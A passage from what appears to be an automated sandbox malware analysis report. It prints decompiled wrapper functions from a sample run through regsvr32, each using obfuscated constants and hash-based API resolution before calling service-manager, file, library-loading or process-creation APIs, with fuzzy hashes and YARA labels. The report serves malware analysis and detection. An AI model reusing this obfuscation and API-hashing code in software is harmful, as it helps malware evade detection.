4924 262eda 4921->4924 4925 27f5d9 GetPEB RtlAllocateHeap 4921->4925 4926 26866c GetPEB 4921->4926 4927 26d2c9 GetPEB 4921->4927 4928 27f94b GetPEB 4921->4928 4923 272519 GetPEB 4922->4923 4923->4924 4924->4892 4925->4921 4926->4921 4927->4921 4928->4921 4930 2686a1 4929->4930 4931 267f78 GetPEB 4930->4931 4932 268728 4931->4932 4932->4913 4934 2764e2 4933->4934 4935 267f78 GetPEB 4934->4935 4936 276555 4935->4936 4936->4913 4950 26fc94 4937->4950 4938 27014c 4940 272519 GetPEB 4938->4940 4939 27014a 4939->4913 4940->4939 4941 2717d2 GetPEB 4941->4950 4943 26303a 2 API calls 4943->4950 4944 26eb4b GetPEB 4944->4950 4945 27f5d9 GetPEB RtlAllocateHeap 4945->4950 4946 27f94b GetPEB 4946->4950 4947 270184 GetPEB 4947->4950 4948 26d2c9 GetPEB 4948->4950 4950->4938 4950->4939 4950->4941 4950->4943 4950->4944 4950->4945 4950->4946 4950->4947 4950->4948 4967 267a69 4950->4967 4971 27a42c 4950->4971 4952 26c9a7 4951->4952 4953 267f78 GetPEB 4952->4953 4954 26ca27 4953->4954 4954->4913 4956 27972f 4955->4956 4957 267f78 GetPEB 4956->4957 4958 27979e 4957->4958 4958->4913 4960 26a865 4959->4960 4961 267f78 GetPEB 4960->4961 4962 26a8e7 4961->4962 4962->4913 4964 26c035 4963->4964 4965 267f78 GetPEB 4964->4965 4966 26c0ac 4965->4966 4966->4913 4968 267a97 4967->4968 4969 267f78 GetPEB 4968->4969 4970 267b06 4969->4970 4970->4950 4972 27a461 4971->4972 4973 267f78 GetPEB 4972->4973 4974 27a4e8 4973->4974 4974->4950 4977 281a26 4975->4977 4976 2725cd GetPEB 4976->4977 4977->4976 4978 281b7b 4977->4978 4980 281b98 4977->4980 4999 2694d4 4977->4999 4995 2633b6 4978->4995 4980->4057 4984 26c83c 4982->4984 4983 27f5d9 2 API calls 4983->4984 4984->4983 4985 26c967 4984->4985 4986 263e99 GetPEB 4984->4986 4988 26c965 4984->4988 4989 27f94b GetPEB 4984->4989 5003 266c71 4984->5003 4987 273cbe GetPEB 4985->4987 4986->4984 4987->4988 4988->4057 4989->4984 4992 2635ca 4991->4992 4993 267f78 GetPEB 4992->4993 4994 263643 4993->4994 4994->4058 4996 2633d4 4995->4996 4997 267f78 GetPEB 4996->4997 4998 263453 4997->4998 4998->4980 5000 2694f1 4999->5000 5001 267f78 GetPEB 5000->5001 5002 26957c 5001->5002 5002->4977 5004 266c8e 5003->5004 5005 267f78 GetPEB 5004->5005 5006 266d06 5005->5006 5006->4984 5048 276998 5049 262263 GetPEB 5048->5049 5050 276c12 5049->5050 5051 26bee4 GetPEB 5050->5051 5052 276c2b 5051->5052 5053 276c95 5052->5053 5054 27f5d9 2 API calls 5052->5054 5055 276c49 5054->5055 5056 278eb3 GetPEB 5055->5056 5057 276c70 5056->5057 5058 27f94b GetPEB 5057->5058 5059 276c83 5058->5059 5060 267bc6 2 API calls 5059->5060 5060->5053

                                                                                                                Executed Functions

                                                                                                                Function 00266E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 266e01-266eb3 call 26c98a call 267f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00266E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E0026C98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E00267F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x00266e0a
                                                                                                                0x00266e0b
                                                                                                                0x00266e0e
                                                                                                                0x00266e11
                                                                                                                0x00266e14
                                                                                                                0x00266e1c
                                                                                                                0x00266e23
                                                                                                                0x00266e2c
                                                                                                                0x00266e33
                                                                                                                0x00266e36
                                                                                                                0x00266e42
                                                                                                                0x00266e47
                                                                                                                0x00266e4c
                                                                                                                0x00266e53
                                                                                                                0x00266e5d
                                                                                                                0x00266e65
                                                                                                                0x00266e6d
                                                                                                                0x00266e74
                                                                                                                0x00266e7b
                                                                                                                0x00266e82
                                                                                                                0x00266e89
                                                                                                                0x00266ea0
                                                                                                                0x00266ead
                                                                                                                0x00266eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00266EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: b4863041ab4aaa9f4182a75e22e100b1dfc3edea479e6aaad550dcf02ae0f7aa
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: B21155B2D01218BBDB04DFA5C8498DEBFB6EF45314F10C189FA18A7241D7B55B259F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00268E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 268e38-268ee4 call 26c98a call 267f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00268E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026C98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E00267F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x00268e3f
                                                                                                                0x00268e42
                                                                                                                0x00268e44
                                                                                                                0x00268e47
                                                                                                                0x00268e4a
                                                                                                                0x00268e4e
                                                                                                                0x00268e4f
                                                                                                                0x00268e54
                                                                                                                0x00268e5e
                                                                                                                0x00268e64
                                                                                                                0x00268e6b
                                                                                                                0x00268e72
                                                                                                                0x00268e79
                                                                                                                0x00268e80
                                                                                                                0x00268e8c
                                                                                                                0x00268e94
                                                                                                                0x00268e9c
                                                                                                                0x00268ea3
                                                                                                                0x00268eaa
                                                                                                                0x00268ebc
                                                                                                                0x00268ebf
                                                                                                                0x00268ecf
                                                                                                                0x00268ede
                                                                                                                0x00268ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00268EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: 05e7c7b0d067aeba8b5b517e28cd82613acf27fc765d5395de659da942455182
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: EF112271E01208FBEF05EFA4DA4A8DEBFB6EB05314F10C089E914A6250E7B55B609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00267BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 267bc6-267c79 call 26c98a call 267f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00267BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E0026C98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E00267F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x00267bcc
                                                                                                                0x00267bd1
                                                                                                                0x00267bd6
                                                                                                                0x00267bdd
                                                                                                                0x00267be3
                                                                                                                0x00267bea
                                                                                                                0x00267bf6
                                                                                                                0x00267bfb
                                                                                                                0x00267c00
                                                                                                                0x00267c07
                                                                                                                0x00267c0e
                                                                                                                0x00267c15
                                                                                                                0x00267c1c
                                                                                                                0x00267c23
                                                                                                                0x00267c2a
                                                                                                                0x00267c31
                                                                                                                0x00267c3b
                                                                                                                0x00267c43
                                                                                                                0x00267c4b
                                                                                                                0x00267c52
                                                                                                                0x00267c69
                                                                                                                0x00267c74
                                                                                                                0x00267c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00267C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 65bb7d12bd84806680f60667ce4294f1764d7d9a731b42299e949cb93bcad589
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: E7116DB1D0124CFFDB08DFE5E94AAAEBBB1EB40304F208198E41477290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0027ED7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 27ed7b-27ee13 call 26c98a call 267f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0027ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t43;
				signed int _t45;
				signed int _t46;
				void* _t53;

				_push(_a8);
				_t53 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0026C98A(_t33);
				_v16 = 0xcf28aa;
				_v16 = _v16 + 0xffff6a13;
				_v16 = _v16 ^ 0x00c8c4e4;
				_v12 = 0x49ff01;
				_t45 = 0xb;
				_v12 = _v12 / _t45;
				_t46 = 0x5d;
				_v12 = _v12 / _t46;
				_v12 = _v12 ^ 0x00001054;
				_v8 = 0x2a1e4a;
				_v8 = _v8 | 0x32e5c17e;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x00072801;
				E00267F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
				_t43 = CloseServiceHandle(_t53); // executed
				return _t43;
			}











                                                                                                                0x0027ed82
                                                                                                                0x0027ed85
                                                                                                                0x0027ed87
                                                                                                                0x0027ed8b
                                                                                                                0x0027ed8c
                                                                                                                0x0027ed91
                                                                                                                0x0027ed9b
                                                                                                                0x0027eda4
                                                                                                                0x0027edab
                                                                                                                0x0027edb7
                                                                                                                0x0027edbc
                                                                                                                0x0027edc4
                                                                                                                0x0027edcc
                                                                                                                0x0027edd4
                                                                                                                0x0027eddb
                                                                                                                0x0027ede2
                                                                                                                0x0027ede9
                                                                                                                0x0027eded
                                                                                                                0x0027ee04
                                                                                                                0x0027ee0d
                                                                                                                0x0027ee13

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0027EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 7395ae7a07a664782f4d0e16acb8dd581b1b25db250291ae45c801ac7b0d95a6
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 34015B71D01208BFDB08EFA4C94A8DEBFB5EF45314F10C08AE914A7241E7B25BA58F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00264A9D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00264A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t32;
				struct HINSTANCE__* _t39;
				WCHAR* _t43;

				_push(_a8);
				_t43 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0026C98A(_t32);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0x1178a2;
				_v16 = 0x17846b;
				_v16 = _v16 | 0x3185073b;
				_v16 = _v16 + 0xffff538e;
				_v16 = _v16 ^ 0x3197b69f;
				_v12 = 0x16ba99;
				_v12 = _v12 ^ 0x02625a09;
				_v12 = _v12 ^ 0x25365766;
				_v12 = _v12 ^ 0x27431ab3;
				_v8 = 0xb183e3;
				_v8 = _v8 * 0x28;
				_v8 = _v8 | 0x77f20d23;
				_v8 = _v8 ^ 0x7ff151f0;
				E00267F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
				_t39 = LoadLibraryW(_t43); // executed
				return _t39;
			}












                                                                                                                0x00264aa4
                                                                                                                0x00264aa7
                                                                                                                0x00264aa9
                                                                                                                0x00264aac
                                                                                                                0x00264aad
                                                                                                                0x00264aae
                                                                                                                0x00264ab3
                                                                                                                0x00264aba
                                                                                                                0x00264ac3
                                                                                                                0x00264aca
                                                                                                                0x00264ad1
                                                                                                                0x00264ad8
                                                                                                                0x00264adf
                                                                                                                0x00264ae6
                                                                                                                0x00264aed
                                                                                                                0x00264af4
                                                                                                                0x00264afb
                                                                                                                0x00264b02
                                                                                                                0x00264b16
                                                                                                                0x00264b19
                                                                                                                0x00264b20
                                                                                                                0x00264b30
                                                                                                                0x00264b39
                                                                                                                0x00264b3f

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 6975cdfaabf10edf3afc085a59ab614dc7cfd532d2b1d3055026d7f169eb9ecc
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 78114871C11208FFCB08EFA4DA469DEBBB4EB00315F20C188E415B6251D3704B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00277B25 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00277B25() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _t31;

				_v16 = 0x340970;
				_t2 =  &_v16; // 0x340970
				_t31 = 0x26;
				_v16 =  *_t2 / _t31;
				_v16 = _v16 ^ 0x000e30ec;
				_v8 = 0x85299d;
				_v8 = _v8 + 0xa54a;
				_v8 = _v8 ^ 0x35a74c3e;
				_v8 = _v8 ^ 0x3521895a;
				_v12 = 0xcc7db5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000f948d;
				E00267F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
				ExitProcess(0);
			}







                                                                                                                0x00277b2b
                                                                                                                0x00277b34
                                                                                                                0x00277b39
                                                                                                                0x00277b41
                                                                                                                0x00277b49
                                                                                                                0x00277b50
                                                                                                                0x00277b57
                                                                                                                0x00277b5e
                                                                                                                0x00277b65
                                                                                                                0x00277b6c
                                                                                                                0x00277b73
                                                                                                                0x00277b77
                                                                                                                0x00277b8e
                                                                                                                0x00277b98

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00277B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 8e132a2bffa235218f50a70c64e6a18ea45b36cc3846690a5a83cd16c89abcc9
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: B9F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B188F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0027A50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0027A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E0026C98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E00267F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x0027a511
                                                                                                                0x0027a516
                                                                                                                0x0027a519
                                                                                                                0x0027a51c
                                                                                                                0x0027a51f
                                                                                                                0x0027a520
                                                                                                                0x0027a523
                                                                                                                0x0027a526
                                                                                                                0x0027a529
                                                                                                                0x0027a52c
                                                                                                                0x0027a52f
                                                                                                                0x0027a532
                                                                                                                0x0027a536
                                                                                                                0x0027a537
                                                                                                                0x0027a53c
                                                                                                                0x0027a546
                                                                                                                0x0027a54f
                                                                                                                0x0027a552
                                                                                                                0x0027a559
                                                                                                                0x0027a55d
                                                                                                                0x0027a561
                                                                                                                0x0027a568
                                                                                                                0x0027a574
                                                                                                                0x0027a579
                                                                                                                0x0027a57e
                                                                                                                0x0027a585
                                                                                                                0x0027a58c
                                                                                                                0x0027a593
                                                                                                                0x0027a59e
                                                                                                                0x0027a5aa
                                                                                                                0x0027a5b3
                                                                                                                0x0027a5bb
                                                                                                                0x0027a5cb
                                                                                                                0x0027a5e4
                                                                                                                0x0027a5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0027A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: ce8afb66c7b32d13b6cd8751bc105608270d867ccf8eb4a335d76bb198c7f3e2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 8221C372901108FBDF05DFE9D94A9EEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0026816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0026816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0026C98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E00267F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x00268173
                                                                                                                0x00268178
                                                                                                                0x0026817a
                                                                                                                0x0026817d
                                                                                                                0x00268180
                                                                                                                0x00268183
                                                                                                                0x00268186
                                                                                                                0x00268187
                                                                                                                0x0026818a
                                                                                                                0x0026818b
                                                                                                                0x0026818e
                                                                                                                0x0026818f
                                                                                                                0x00268192
                                                                                                                0x00268195
                                                                                                                0x00268196
                                                                                                                0x00268199
                                                                                                                0x0026819c
                                                                                                                0x0026819f
                                                                                                                0x002681a0
                                                                                                                0x002681a1
                                                                                                                0x002681a6
                                                                                                                0x002681b0
                                                                                                                0x002681bc
                                                                                                                0x002681c3
                                                                                                                0x002681ca
                                                                                                                0x002681d1
                                                                                                                0x002681d8
                                                                                                                0x002681ef
                                                                                                                0x002681f2
                                                                                                                0x002681f6
                                                                                                                0x002681fd
                                                                                                                0x00268204
                                                                                                                0x00268208
                                                                                                                0x0026820c
                                                                                                                0x0026821c
